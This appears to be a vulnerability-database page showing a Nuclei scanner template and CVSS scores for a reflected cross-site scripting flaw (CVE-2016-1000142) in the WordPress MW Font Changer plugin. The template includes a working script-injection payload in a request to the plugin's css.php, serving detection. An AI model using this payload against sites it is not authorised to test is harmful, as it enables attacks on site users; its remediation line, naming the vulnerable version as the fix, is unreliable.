Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000142
HistorySep 16, 2021 - 10:56 p.m.

WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting

2021-09-1622:56:23
ProjectDiscovery
github.com
6

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

42.1%

WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000142

info:
  name: WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Allows remote attackers to execute arbitrary script or HTML code in the context of the affected site, potentially leading to session hijacking, defacement, or data theft.
  remediation: |
    Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary.
  reference:
    - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=435
    - https://wordpress.org/plugins/parsi-font
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000142
    cwe-id: CWE-79
    epss-score: 0.00103
    epss-percentile: 0.41915
    cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "parsi-font_project"
    product: "parsi-font"
    framework: wordpress
  tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'WP-Parsi Admin Font Editor'
          - 'MW Font Changer'
        condition: or

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402204c5bd3395922e4d4d94f70f082d7d7ff53902791d953203ee486a404e88d5de9022014c3ca3455afdf834b5a159409cd9e1dce749840033c1816d47c989482fdb95d:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

42.1%

Related for NUCLEI:CVE-2016-1000142